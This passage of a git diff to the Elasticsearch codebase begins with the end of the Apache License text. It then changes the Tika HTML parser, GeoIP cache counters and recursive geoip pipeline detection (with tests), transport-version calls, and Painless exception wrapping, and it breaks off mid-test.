the following conditions: - - (a) You must give any other recipients of the Work or - Derivative Works a copy of this License; and - - (b) You must cause any modified files to carry prominent notices - stating that You changed the files; and - - (c) You must retain, in the Source form of any Derivative Works - that You distribute, all copyright, patent, trademark, and - attribution notices from the Source form of the Work, - excluding those notices that do not pertain to any part of - the Derivative Works; and - - (d) If the Work includes a "NOTICE" text file as part of its - distribution, then any Derivative Works that You distribute must - include a readable copy of the attribution notices contained - within such NOTICE file, excluding those notices that do not - pertain to any part of the Derivative Works, in at least one - of the following places: within a NOTICE text file distributed - as part of the Derivative Works; within the Source form or - documentation, if provided along with the Derivative Works; or, - within a display generated by the Derivative Works, if and - wherever such third-party notices normally appear. The contents - of the NOTICE file are for informational purposes only and - do not modify the License. You may add Your own attribution - notices within Derivative Works that You distribute, alongside - or as an addendum to the NOTICE text from the Work, provided - that such additional attribution notices cannot be construed - as modifying the License. - - You may add Your own copyright statement to Your modifications and - may provide additional or different license terms and conditions - for use, reproduction, or distribution of Your modifications, or - for any such Derivative Works as a whole, provided Your use, - reproduction, and distribution of the Work otherwise complies with - the conditions stated in this License. - - 5. Submission of Contributions. Unless You explicitly state otherwise, - any Contribution intentionally submitted for inclusion in the Work - by You to the Licensor shall be under the terms and conditions of - this License, without any additional terms or conditions. - Notwithstanding the above, nothing herein shall supersede or modify - the terms of any separate license agreement you may have executed - with Licensor regarding such Contributions. - - 6. Trademarks. This License does not grant permission to use the trade - names, trademarks, service marks, or product names of the Licensor, - except as required for reasonable and customary use in describing the - origin of the Work and reproducing the content of the NOTICE file. - - 7. Disclaimer of Warranty. Unless required by applicable law or - agreed to in writing, Licensor provides the Work (and each - Contributor provides its Contributions) on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or - implied, including, without limitation, any warranties or conditions - of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A - PARTICULAR PURPOSE. You are solely responsible for determining the - appropriateness of using or redistributing the Work and assume any - risks associated with Your exercise of permissions under this License. - - 8. Limitation of Liability. In no event and under no legal theory, - whether in tort (including negligence), contract, or otherwise, - unless required by applicable law (such as deliberate and grossly - negligent acts) or agreed to in writing, shall any Contributor be - liable to You for damages, including any direct, indirect, special, - incidental, or consequential damages of any character arising as a - result of this License or out of the use or inability to use the - Work (including but not limited to damages for loss of goodwill, - work stoppage, computer failure or malfunction, or any and all - other commercial damages or losses), even if such Contributor - has been advised of the possibility of such damages. - - 9. Accepting Warranty or Additional Liability. While redistributing - the Work or Derivative Works thereof, You may choose to offer, - and charge a fee for, acceptance of support, warranty, indemnity, - or other liability obligations and/or rights consistent with this - License. However, in accepting such obligations, You may act only - on Your own behalf and on Your sole responsibility, not on behalf - of any other Contributor, and only if You agree to indemnify, - defend, and hold each Contributor harmless for any liability - incurred by, or claims asserted against, such Contributor by reason - of your accepting any such warranty or additional liability. - - END OF TERMS AND CONDITIONS - - APPENDIX: How to apply the Apache License to your work. - - To apply the Apache License to your work, attach the following - boilerplate notice, with the fields enclosed by brackets "[]" - replaced with your own identifying information. (Don't include - the brackets!) The text should be enclosed in the appropriate - comment syntax for the file format. We also recommend that a - file or class name and description of purpose be included on the - same "printed page" as the copyright notice for easier - identification within third-party archives. - - Copyright [yyyy] [name of copyright owner] - - Licensed under the Apache License, Version 2.0 (the "License"); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. diff --git a/modules/ingest-attachment/src/main/java/org/elasticsearch/ingest/attachment/TikaImpl.java b/modules/ingest-attachment/src/main/java/org/elasticsearch/ingest/attachment/TikaImpl.java index c057d17576c0a..f83768784d3cd 100644 --- a/modules/ingest-attachment/src/main/java/org/elasticsearch/ingest/attachment/TikaImpl.java +++ b/modules/ingest-attachment/src/main/java/org/elasticsearch/ingest/attachment/TikaImpl.java @@ -16,6 +16,7 @@ import org.apache.tika.parser.AutoDetectParser; import org.apache.tika.parser.Parser; import org.apache.tika.parser.ParserDecorator; +import org.apache.tika.parser.html.JSoupParser; import java.io.ByteArrayInputStream; import java.io.IOException; @@ -46,7 +47,7 @@ final class TikaImpl { /** subset of parsers for types we support */ private static final Parser PARSERS[] = new Parser[] { // documents - new org.apache.tika.parser.html.HtmlParser(), + new JSoupParser(), new org.apache.tika.parser.microsoft.rtf.RTFParser(), new org.apache.tika.parser.pdf.PDFParser(), new org.apache.tika.parser.txt.TXTParser(), diff --git a/modules/ingest-geoip/src/main/java/org/elasticsearch/ingest/geoip/GeoIpCache.java b/modules/ingest-geoip/src/main/java/org/elasticsearch/ingest/geoip/GeoIpCache.java index 47dd3d86e9983..0efe509475ecf 100644 --- a/modules/ingest-geoip/src/main/java/org/elasticsearch/ingest/geoip/GeoIpCache.java +++ b/modules/ingest-geoip/src/main/java/org/elasticsearch/ingest/geoip/GeoIpCache.java @@ -17,7 +17,7 @@ import org.elasticsearch.ingest.geoip.stats.CacheStats; import java.nio.file.Path; -import java.util.concurrent.atomic.AtomicLong; +import java.util.concurrent.atomic.LongAdder; import java.util.function.Function; import java.util.function.LongSupplier; @@ -44,8 +44,8 @@ public String toString() { private final LongSupplier relativeNanoTimeProvider; private final Cache cache; - private final AtomicLong hitsTimeInNanos = new AtomicLong(0); - private final AtomicLong missesTimeInNanos = new AtomicLong(0); + private final LongAdder hitsTimeInNanos = new LongAdder(); + private final LongAdder missesTimeInNanos = new LongAdder(); // package private for testing GeoIpCache(long maxSize, LongSupplier relativeNanoTimeProvider) { @@ -80,9 +80,9 @@ RESPONSE putIfAbsent(ProjectId projectId, String ip, String databaseP // store the result or no-result in the cache cache.put(cacheKey, response); long databaseRequestAndCachePutTime = relativeNanoTimeProvider.getAsLong() - retrieveStart; - missesTimeInNanos.addAndGet(cacheRequestTime + databaseRequestAndCachePutTime); + missesTimeInNanos.add(cacheRequestTime + databaseRequestAndCachePutTime); } else { - hitsTimeInNanos.addAndGet(cacheRequestTime); + hitsTimeInNanos.add(cacheRequestTime); } if (response == NO_RESULT) { @@ -126,8 +126,8 @@ public CacheStats getCacheStats() { stats.getHits(), stats.getMisses(), stats.getEvictions(), - TimeValue.nsecToMSec(hitsTimeInNanos.get()), - TimeValue.nsecToMSec(missesTimeInNanos.get()) + TimeValue.nsecToMSec(hitsTimeInNanos.sum()), + TimeValue.nsecToMSec(missesTimeInNanos.sum()) ); } diff --git a/modules/ingest-geoip/src/main/java/org/elasticsearch/ingest/geoip/GeoIpDownloaderTaskExecutor.java b/modules/ingest-geoip/src/main/java/org/elasticsearch/ingest/geoip/GeoIpDownloaderTaskExecutor.java index 087a5b4e6296c..6d55e94b0a23d 100644 --- a/modules/ingest-geoip/src/main/java/org/elasticsearch/ingest/geoip/GeoIpDownloaderTaskExecutor.java +++ b/modules/ingest-geoip/src/main/java/org/elasticsearch/ingest/geoip/GeoIpDownloaderTaskExecutor.java @@ -21,6 +21,7 @@ import org.elasticsearch.cluster.ClusterChangedEvent; import org.elasticsearch.cluster.ClusterStateListener; import org.elasticsearch.cluster.metadata.IndexAbstraction; +import org.elasticsearch.cluster.metadata.IndexMetadata; import org.elasticsearch.cluster.metadata.ProjectId; import org.elasticsearch.cluster.metadata.ProjectMetadata; import org.elasticsearch.cluster.node.DiscoveryNode; @@ -47,6 +48,7 @@ import org.elasticsearch.transport.RemoteTransportException; import java.util.Collections; +import java.util.HashMap; import java.util.HashSet; import java.util.List; import java.util.Map; @@ -280,11 +282,14 @@ static boolean hasAtLeastOneGeoipProcessor(ProjectMetadata projectMetadata) { return false; } - return projectMetadata.indices().values().stream().anyMatch(indexMetadata -> { + for (IndexMetadata indexMetadata : projectMetadata.indices().values()) { String defaultPipeline = IndexSettings.DEFAULT_PIPELINE.get(indexMetadata.getSettings()); String finalPipeline = IndexSettings.FINAL_PIPELINE.get(indexMetadata.getSettings()); - return checkReferencedPipelines.contains(defaultPipeline) || checkReferencedPipelines.contains(finalPipeline); - }); + if (checkReferencedPipelines.contains(defaultPipeline) || checkReferencedPipelines.contains(finalPipeline)) { + return true; + } + } + return false; } /** @@ -297,12 +302,26 @@ static boolean hasAtLeastOneGeoipProcessor(ProjectMetadata projectMetadata) { @SuppressWarnings("unchecked") private static Set pipelinesWithGeoIpProcessor(ProjectMetadata projectMetadata, boolean downloadDatabaseOnPipelineCreation) { List configurations = IngestService.getPipelines(projectMetadata); + Map pipelineConfigById = HashMap.newHashMap(configurations.size()); + for (PipelineConfiguration configuration : configurations) { + pipelineConfigById.put(configuration.getId(), configuration); + } + // this map is used to keep track of pipelines that have already been checked + Map pipelineHasGeoProcessorById = HashMap.newHashMap(configurations.size()); Set ids = new HashSet<>(); // note: this loop is unrolled rather than streaming-style because it's hot enough to show up in a flamegraph for (PipelineConfiguration configuration : configurations) { List> processors = (List>) configuration.getConfig().get(Pipeline.PROCESSORS_KEY); - if (hasAtLeastOneGeoipProcessor(processors, downloadDatabaseOnPipelineCreation)) { - ids.add(configuration.getId()); + String pipelineName = configuration.getId(); + if (pipelineHasGeoProcessorById.containsKey(pipelineName) == false) { + if (hasAtLeastOneGeoipProcessor( + processors, + downloadDatabaseOnPipelineCreation, + pipelineConfigById, + pipelineHasGeoProcessorById + )) { + ids.add(pipelineName); + } } } return Collections.unmodifiableSet(ids); @@ -312,13 +331,27 @@ private static Set pipelinesWithGeoIpProcessor(ProjectMetadata projectMe * Check if a list of processor contains at least a geoip processor. * @param processors List of processors. * @param downloadDatabaseOnPipelineCreation Should the download_database_on_pipeline_creation of the geoip processor be true or false. + * @param pipelineConfigById A Map of pipeline id to PipelineConfiguration + * @param pipelineHasGeoProcessorById A Map of pipeline id to Boolean, indicating whether the pipeline references a geoip processor + * (true), does not reference a geoip processor (false), or we are currently trying to figure that + * out (null). * @return true if a geoip processor is found in the processor list. */ - private static boolean hasAtLeastOneGeoipProcessor(List> processors, boolean downloadDatabaseOnPipelineCreation) { + private static boolean hasAtLeastOneGeoipProcessor( + List> processors, + boolean downloadDatabaseOnPipelineCreation, + Map pipelineConfigById, + Map pipelineHasGeoProcessorById + ) { if (processors != null) { // note: this loop is unrolled rather than streaming-style because it's hot enough to show up in a flamegraph for (Map processor : processors) { - if (hasAtLeastOneGeoipProcessor(processor, downloadDatabaseOnPipelineCreation)) { + if (hasAtLeastOneGeoipProcessor( + processor, + downloadDatabaseOnPipelineCreation, + pipelineConfigById, + pipelineHasGeoProcessorById + )) { return true; } } @@ -330,10 +363,19 @@ private static boolean hasAtLeastOneGeoipProcessor(List> pro * Check if a processor config is a geoip processor or contains at least a geoip processor. * @param processor Processor config. * @param downloadDatabaseOnPipelineCreation Should the download_database_on_pipeline_creation of the geoip processor be true or false. + * @param pipelineConfigById A Map of pipeline id to PipelineConfiguration + * @param pipelineHasGeoProcessorById A Map of pipeline id to Boolean, indicating whether the pipeline references a geoip processor + * (true), does not reference a geoip processor (false), or we are currently trying to figure that + * out (null). * @return true if a geoip processor is found in the processor list. */ @SuppressWarnings("unchecked") - private static boolean hasAtLeastOneGeoipProcessor(Map processor, boolean downloadDatabaseOnPipelineCreation) { + private static boolean hasAtLeastOneGeoipProcessor( + Map processor, + boolean downloadDatabaseOnPipelineCreation, + Map pipelineConfigById, + Map pipelineHasGeoProcessorById + ) { if (processor == null) { return false; } @@ -352,27 +394,51 @@ private static boolean hasAtLeastOneGeoipProcessor(Map processor } } - return isProcessorWithOnFailureGeoIpProcessor(processor, downloadDatabaseOnPipelineCreation) - || isForeachProcessorWithGeoipProcessor(processor, downloadDatabaseOnPipelineCreation); + return isProcessorWithOnFailureGeoIpProcessor( + processor, + downloadDatabaseOnPipelineCreation, + pipelineConfigById, + pipelineHasGeoProcessorById + ) + || isForeachProcessorWithGeoipProcessor( + processor, + downloadDatabaseOnPipelineCreation, + pipelineConfigById, + pipelineHasGeoProcessorById + ) + || isPipelineProcessorWithGeoIpProcessor( + processor, + downloadDatabaseOnPipelineCreation, + pipelineConfigById, + pipelineHasGeoProcessorById + ); } /** * Check if a processor config has an on_failure clause containing at least a geoip processor. * @param processor Processor config. * @param downloadDatabaseOnPipelineCreation Should the download_database_on_pipeline_creation of the geoip processor be true or false. + * @param pipelineConfigById A Map of pipeline id to PipelineConfiguration + * @param pipelineHasGeoProcessorById A Map of pipeline id to Boolean, indicating whether the pipeline references a geoip processor + * (true), does not reference a geoip processor (false), or we are currently trying to figure that + * out (null). * @return true if a geoip processor is found in the processor list. */ @SuppressWarnings("unchecked") private static boolean isProcessorWithOnFailureGeoIpProcessor( Map processor, - boolean downloadDatabaseOnPipelineCreation + boolean downloadDatabaseOnPipelineCreation, + Map pipelineConfigById, + Map pipelineHasGeoProcessorById ) { // note: this loop is unrolled rather than streaming-style because it's hot enough to show up in a flamegraph for (Object value : processor.values()) { if (value instanceof Map && hasAtLeastOneGeoipProcessor( ((Map>>) value).get("on_failure"), - downloadDatabaseOnPipelineCreation + downloadDatabaseOnPipelineCreation, + pipelineConfigById, + pipelineHasGeoProcessorById )) { return true; } @@ -384,13 +450,84 @@ && hasAtLeastOneGeoipProcessor( * Check if a processor is a foreach processor containing at least a geoip processor. * @param processor Processor config. * @param downloadDatabaseOnPipelineCreation Should the download_database_on_pipeline_creation of the geoip processor be true or false. + * @param pipelineConfigById A Map of pipeline id to PipelineConfiguration + * @param pipelineHasGeoProcessorById A Map of pipeline id to Boolean, indicating whether the pipeline references a geoip processor + * (true), does not reference a geoip processor (false), or we are currently trying to figure that + * out (null). * @return true if a geoip processor is found in the processor list. */ @SuppressWarnings("unchecked") - private static boolean isForeachProcessorWithGeoipProcessor(Map processor, boolean downloadDatabaseOnPipelineCreation) { + private static boolean isForeachProcessorWithGeoipProcessor( + Map processor, + boolean downloadDatabaseOnPipelineCreation, + Map pipelineConfigById, + Map pipelineHasGeoProcessorById + ) { final Map processorConfig = (Map) processor.get("foreach"); return processorConfig != null - && hasAtLeastOneGeoipProcessor((Map) processorConfig.get("processor"), downloadDatabaseOnPipelineCreation); + && hasAtLeastOneGeoipProcessor( + (Map) processorConfig.get("processor"), + downloadDatabaseOnPipelineCreation, + pipelineConfigById, + pipelineHasGeoProcessorById + ); + } + + /** + * Check if a processor is a pipeline processor containing at least a geoip processor. This method also updates + * pipelineHasGeoProcessorById with a result for any pipelines it looks at. + * @param processor Processor config. + * @param downloadDatabaseOnPipelineCreation Should the download_database_on_pipeline_creation of the geoip processor be true or false. + * @param pipelineConfigById A Map of pipeline id to PipelineConfiguration + * @param pipelineHasGeoProcessorById A Map of pipeline id to Boolean, indicating whether the pipeline references a geoip processor + * (true), does not reference a geoip processor (false), or we are currently trying to figure that + * out (null). + * @return true if a geoip processor is found in the processors of this processor if this processor is a pipeline processor. + */ + @SuppressWarnings("unchecked") + private static boolean isPipelineProcessorWithGeoIpProcessor( + Map processor, + boolean downloadDatabaseOnPipelineCreation, + Map pipelineConfigById, + Map pipelineHasGeoProcessorById + ) { + final Map processorConfig = (Map) processor.get("pipeline"); + if (processorConfig != null) { + String pipelineName = (String) processorConfig.get("name"); + if (pipelineName != null) { + if (pipelineHasGeoProcessorById.containsKey(pipelineName)) { + if (pipelineHasGeoProcessorById.get(pipelineName) == null) { + /* + * If the value is null here, it indicates that this method has been called recursively with the same pipeline name. + * This will cause a runtime error when the pipeline is executed, but we're avoiding changing existing behavior at + * server startup time. Instead, we just bail out as quickly as possible. It is possible that this could lead to a + * geo database not being downloaded for the pipeline, but it doesn't really matter since the pipeline was going to + * fail anyway. + */ + pipelineHasGeoProcessorById.put(pipelineName, false); + } + } else { + List> childProcessors = null; + PipelineConfiguration config = pipelineConfigById.get(pipelineName); + if (config != null) { + childProcessors = (List>) config.getConfig().get(Pipeline.PROCESSORS_KEY); + } + // We initialize this to null so that we know it's in progress and can use it to avoid stack overflow errors: + pipelineHasGeoProcessorById.put(pipelineName, null); + pipelineHasGeoProcessorById.put( + pipelineName, + hasAtLeastOneGeoipProcessor( + childProcessors, + downloadDatabaseOnPipelineCreation, + pipelineConfigById, + pipelineHasGeoProcessorById + ) + ); + } + return pipelineHasGeoProcessorById.get(pipelineName); + } + } + return false; } // starts GeoIP downloader task for a single project diff --git a/modules/ingest-geoip/src/main/java/org/elasticsearch/ingest/geoip/GeoIpTaskParams.java b/modules/ingest-geoip/src/main/java/org/elasticsearch/ingest/geoip/GeoIpTaskParams.java index 667ffb82a9640..e980b05797ce8 100644 --- a/modules/ingest-geoip/src/main/java/org/elasticsearch/ingest/geoip/GeoIpTaskParams.java +++ b/modules/ingest-geoip/src/main/java/org/elasticsearch/ingest/geoip/GeoIpTaskParams.java @@ -10,7 +10,6 @@ package org.elasticsearch.ingest.geoip; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.persistent.PersistentTaskParams; @@ -44,7 +43,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/modules/ingest-geoip/src/main/java/org/elasticsearch/ingest/geoip/GeoIpTaskState.java b/modules/ingest-geoip/src/main/java/org/elasticsearch/ingest/geoip/GeoIpTaskState.java index 4014291cfaf6b..98e343975db3b 100644 --- a/modules/ingest-geoip/src/main/java/org/elasticsearch/ingest/geoip/GeoIpTaskState.java +++ b/modules/ingest-geoip/src/main/java/org/elasticsearch/ingest/geoip/GeoIpTaskState.java @@ -132,7 +132,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/modules/ingest-geoip/src/test/java/org/elasticsearch/ingest/geoip/GeoIpDownloaderTaskExecutorTests.java b/modules/ingest-geoip/src/test/java/org/elasticsearch/ingest/geoip/GeoIpDownloaderTaskExecutorTests.java index eccc29d22277f..09eb7fb65585d 100644 --- a/modules/ingest-geoip/src/test/java/org/elasticsearch/ingest/geoip/GeoIpDownloaderTaskExecutorTests.java +++ b/modules/ingest-geoip/src/test/java/org/elasticsearch/ingest/geoip/GeoIpDownloaderTaskExecutorTests.java @@ -52,6 +52,101 @@ public void testHasAtLeastOneGeoipProcessorWhenDownloadDatabaseOnPipelineCreatio } + /* + * This tests that if a default or final pipeline has a pipeline processor that has a geoip processor that has + * download_database_on_pipeline_creation set to false, then we will correctly acknowledge that the pipeline has a geoip processor so + * that we download it appropriately. + */ + public void testHasAtLeastOneGeoipProcessorInPipelineProcessorWhenDownloadDatabaseOnPipelineCreationIsFalse() throws IOException { + String innerInnerPipelineJson = """ + { + "processors":[""" + getGeoIpProcessor(false) + """ + ] + } + """; + String innerPipelineJson = """ + { + "processors":[{"pipeline": {"name": "innerInnerPipeline"}} + ] + } + """; + String outerPipelineJson = """ + { + "processors":[{"pipeline": {"name": "innerPipeline"}} + ] + } + """; + IngestMetadata ingestMetadata = new IngestMetadata( + Map.of( + "innerInnerPipeline", + new PipelineConfiguration("innerInnerPipeline", new BytesArray(innerInnerPipelineJson), XContentType.JSON), + "innerPipeline", + new PipelineConfiguration("innerPipeline", new BytesArray(innerPipelineJson), XContentType.JSON), + "outerPipeline", + new PipelineConfiguration("outerPipeline", new BytesArray(outerPipelineJson), XContentType.JSON) + ) + ); + // The pipeline is not used in any index, expected to return false. + var projectMetadata = projectMetadataWithIndex(b -> {}, ingestMetadata); + assertFalse(GeoIpDownloaderTaskExecutor.hasAtLeastOneGeoipProcessor(projectMetadata)); + + // The pipeline is set as default pipeline in an index, expected to return true. + projectMetadata = projectMetadataWithIndex(b -> b.put(IndexSettings.DEFAULT_PIPELINE.getKey(), "outerPipeline"), ingestMetadata); + assertTrue(GeoIpDownloaderTaskExecutor.hasAtLeastOneGeoipProcessor(projectMetadata)); + + // The pipeline is set as final pipeline in an index, expected to return true. + projectMetadata = projectMetadataWithIndex(b -> b.put(IndexSettings.FINAL_PIPELINE.getKey(), "outerPipeline"), ingestMetadata); + assertTrue(GeoIpDownloaderTaskExecutor.hasAtLeastOneGeoipProcessor(projectMetadata)); + } + + public void testHasAtLeastOneGeoipProcessorRecursion() throws IOException { + /* + * The pipeline in this test is invalid -- it has a cycle from outerPipeline -> innerPipeline -> innerInnerPipeline -> + * innerPipeline. Since this method is called at server startup, we want to make sure that we don't get a StackOverFlowError and + * that we don't throw any kind of validation exception (since that would be an unexpected change of behavior). + */ + String innerInnerPipelineJson = """ + { + "processors":[""" + getGeoIpProcessor(false) + """ + , {"pipeline": {"name": "innerPipeline"}} + ] + } + """; + String innerPipelineJson = """ + { + "processors":[{"pipeline": {"name": "innerInnerPipeline"}} + ] + } + """; + String outerPipelineJson = """ + { + "processors":[{"pipeline": {"name": "innerPipeline"}} + ] + } + """; + IngestMetadata ingestMetadata = new IngestMetadata( + Map.of( + "innerInnerPipeline", + new PipelineConfiguration("innerInnerPipeline", new BytesArray(innerInnerPipelineJson), XContentType.JSON), + "innerPipeline", + new PipelineConfiguration("innerPipeline", new BytesArray(innerPipelineJson), XContentType.JSON), + "outerPipeline", + new PipelineConfiguration("outerPipeline", new BytesArray(outerPipelineJson), XContentType.JSON) + ) + ); + // The pipeline is not used in any index, expected to return false. + var projectMetadata = projectMetadataWithIndex(b -> {}, ingestMetadata); + assertFalse(GeoIpDownloaderTaskExecutor.hasAtLeastOneGeoipProcessor(projectMetadata)); + + // The pipeline is set as default pipeline in an index, expected to return true. + projectMetadata = projectMetadataWithIndex(b -> b.put(IndexSettings.DEFAULT_PIPELINE.getKey(), "outerPipeline"), ingestMetadata); + assertTrue(GeoIpDownloaderTaskExecutor.hasAtLeastOneGeoipProcessor(projectMetadata)); + + // The pipeline is set as final pipeline in an index, expected to return true. + projectMetadata = projectMetadataWithIndex(b -> b.put(IndexSettings.FINAL_PIPELINE.getKey(), "outerPipeline"), ingestMetadata); + assertTrue(GeoIpDownloaderTaskExecutor.hasAtLeastOneGeoipProcessor(projectMetadata)); + } + public void testHasAtLeastOneGeoipProcessor() throws IOException { var projectId = Metadata.DEFAULT_PROJECT_ID; List expectHitsInputs = getPipelinesWithGeoIpProcessors(true); diff --git a/modules/ingest-geoip/src/internalClusterTest/java/org/elasticsearch/ingest/geoip/ReloadingDatabasesWhilePerformingGeoLookupsIT.java b/modules/ingest-geoip/src/test/java/org/elasticsearch/ingest/geoip/ReloadingDatabasesWhilePerformingGeoLookupsTests.java similarity index 99% rename from modules/ingest-geoip/src/internalClusterTest/java/org/elasticsearch/ingest/geoip/ReloadingDatabasesWhilePerformingGeoLookupsIT.java rename to modules/ingest-geoip/src/test/java/org/elasticsearch/ingest/geoip/ReloadingDatabasesWhilePerformingGeoLookupsTests.java index c65d9a2dc2009..7f298038141df 100644 --- a/modules/ingest-geoip/src/internalClusterTest/java/org/elasticsearch/ingest/geoip/ReloadingDatabasesWhilePerformingGeoLookupsIT.java +++ b/modules/ingest-geoip/src/test/java/org/elasticsearch/ingest/geoip/ReloadingDatabasesWhilePerformingGeoLookupsTests.java @@ -57,7 +57,7 @@ // 'WindowsFS.checkDeleteAccess(...)'). } ) -public class ReloadingDatabasesWhilePerformingGeoLookupsIT extends ESTestCase { +public class ReloadingDatabasesWhilePerformingGeoLookupsTests extends ESTestCase { /** * This tests essentially verifies that a Maxmind database reader doesn't fail with: diff --git a/modules/lang-mustache/src/internalClusterTest/java/org/elasticsearch/script/mustache/MultiSearchTemplateIT.java b/modules/lang-mustache/src/internalClusterTest/java/org/elasticsearch/script/mustache/MultiSearchTemplateIT.java index 6a418d2265a48..2c94f1d58f4b3 100644 --- a/modules/lang-mustache/src/internalClusterTest/java/org/elasticsearch/script/mustache/MultiSearchTemplateIT.java +++ b/modules/lang-mustache/src/internalClusterTest/java/org/elasticsearch/script/mustache/MultiSearchTemplateIT.java @@ -9,7 +9,7 @@ package org.elasticsearch.script.mustache; -import org.elasticsearch.TransportVersions; +import org.elasticsearch.TransportVersion; import org.elasticsearch.action.index.IndexRequestBuilder; import org.elasticsearch.action.search.SearchRequest; import org.elasticsearch.common.Strings; @@ -210,7 +210,7 @@ public void testCCSCheckCompatibility() throws Exception { "[fail_before_current_version] was released first in version %s, failed compatibility " + "check trying to send it to node with version %s", FailBeforeCurrentVersionQueryBuilder.FUTURE_VERSION.toReleaseVersion(), - TransportVersions.MINIMUM_CCS_VERSION.toReleaseVersion() + TransportVersion.minimumCCSVersion().toReleaseVersion() ); String actualCause = ex.getCause().getMessage(); assertEquals(expectedCause, actualCause); diff --git a/modules/lang-mustache/src/internalClusterTest/java/org/elasticsearch/script/mustache/SearchTemplateIT.java b/modules/lang-mustache/src/internalClusterTest/java/org/elasticsearch/script/mustache/SearchTemplateIT.java index cc0b0122e9cce..1ef8fdb1484dd 100644 --- a/modules/lang-mustache/src/internalClusterTest/java/org/elasticsearch/script/mustache/SearchTemplateIT.java +++ b/modules/lang-mustache/src/internalClusterTest/java/org/elasticsearch/script/mustache/SearchTemplateIT.java @@ -426,7 +426,7 @@ public void testIndexedTemplateWithArray() { /** * Test that triggering the CCS compatibility check with a query that shouldn't go to the minor before - * TransportVersions.MINIMUM_CCS_VERSION works + * TransportVersion.minimumCCSVersion() works */ public void testCCSCheckCompatibility() throws Exception { String templateString = """ diff --git a/modules/lang-painless/src/main/java/org/elasticsearch/painless/DefBootstrap.java b/modules/lang-painless/src/main/java/org/elasticsearch/painless/DefBootstrap.java index 8d0b79fe268a6..990dad06ae110 100644 --- a/modules/lang-painless/src/main/java/org/elasticsearch/painless/DefBootstrap.java +++ b/modules/lang-painless/src/main/java/org/elasticsearch/painless/DefBootstrap.java @@ -201,7 +201,10 @@ protected MethodHandle computeValue(Class receiverType) { try { return lookup(flavor, name, receiverType).asType(type); } catch (Throwable t) { - Def.rethrow(t); + // ClassValue.getFromHashMap wraps checked exceptions as Error, so we + // use a sentinel class [PainlessWrappedException] here to work around + // this issue and later unwrap the original exception + Def.rethrow(t instanceof Exception ? new PainlessWrappedException((Exception) t) : t); throw new AssertionError(); } } diff --git a/modules/lang-painless/src/main/java/org/elasticsearch/painless/PainlessScript.java b/modules/lang-painless/src/main/java/org/elasticsearch/painless/PainlessScript.java index d8e6fa62567e5..4806831f2f8c5 100644 --- a/modules/lang-painless/src/main/java/org/elasticsearch/painless/PainlessScript.java +++ b/modules/lang-painless/src/main/java/org/elasticsearch/painless/PainlessScript.java @@ -46,6 +46,9 @@ public interface PainlessScript { * @return The generated ScriptException. */ default ScriptException convertToScriptException(Throwable t, Map> extraMetadata) { + if (t instanceof PainlessWrappedException) { + t = t.getCause(); + } // create a script stack: this is just the script portion List scriptStack = new ArrayList<>(); ScriptException.Position pos = null; diff --git a/modules/lang-painless/src/main/java/org/elasticsearch/painless/PainlessWrappedException.java b/modules/lang-painless/src/main/java/org/elasticsearch/painless/PainlessWrappedException.java new file mode 100644 index 0000000000000..68d95c286812f --- /dev/null +++ b/modules/lang-painless/src/main/java/org/elasticsearch/painless/PainlessWrappedException.java @@ -0,0 +1,26 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.painless; + +/** + * Checked exceptions are wrapped in {@link ClassValue}#getFromHashMap in Error + * which leads to unexpected behavior in Painless. This class is used as a + * workaround for that exception wrapping. + */ +public class PainlessWrappedException extends Error { + + /** + * Constructor. + * @param cause The {@link Exception} cause. + */ + public PainlessWrappedException(final Exception cause) { + super(cause); + } +} diff --git a/modules/lang-painless/src/main/java/org/elasticsearch/painless/phase/PainlessUserTreeToIRTreePhase.java b/modules/lang-painless/src/main/java/org/elasticsearch/painless/phase/PainlessUserTreeToIRTreePhase.java index 72ecf1fe850ec..02e7774075e55 100644 --- a/modules/lang-painless/src/main/java/org/elasticsearch/painless/phase/PainlessUserTreeToIRTreePhase.java +++ b/modules/lang-painless/src/main/java/org/elasticsearch/painless/phase/PainlessUserTreeToIRTreePhase.java @@ -12,6 +12,7 @@ import org.elasticsearch.painless.Location; import org.elasticsearch.painless.PainlessError; import org.elasticsearch.painless.PainlessExplainError; +import org.elasticsearch.painless.PainlessWrappedException; import org.elasticsearch.painless.ScriptClassInfo; import org.elasticsearch.painless.ScriptClassInfo.MethodArgument; import org.elasticsearch.painless.ir.BinaryImplNode; @@ -415,6 +416,7 @@ protected static void injectSandboxExceptions(FunctionNode irFunctionNode) { for (Class throwable : List.of( PainlessError.class, + PainlessWrappedException.class, LinkageError.class, OutOfMemoryError.class, StackOverflowError.class, diff --git a/modules/lang-painless/src/test/java/org/elasticsearch/painless/DefBootstrapTests.java b/modules/lang-painless/src/test/java/org/elasticsearch/painless/DefBootstrapTests.java index b22329b8d6bfb..dca2350482616 100644 --- a/modules/lang-painless/src/test/java/org/elasticsearch/painless/DefBootstrapTests.java +++ b/modules/lang-painless/src/test/java/org/elasticsearch/painless/DefBootstrapTests.java @@ -139,9 +139,11 @@ public void testMegamorphic() throws Throwable { map.put("a", "b"); assertEquals(2, (int) handle.invokeExact((Object) map)); - final IllegalArgumentException iae = expectThrows(IllegalArgumentException.class, () -> { + final PainlessWrappedException pwe = expectThrows(PainlessWrappedException.class, () -> { Integer.toString((int) handle.invokeExact(new Object())); }); + assertTrue(pwe.getCause() instanceof IllegalArgumentException); + IllegalArgumentException iae = (IllegalArgumentException) pwe.getCause(); assertEquals("dynamic method [java.lang.Object, size/0] not found", 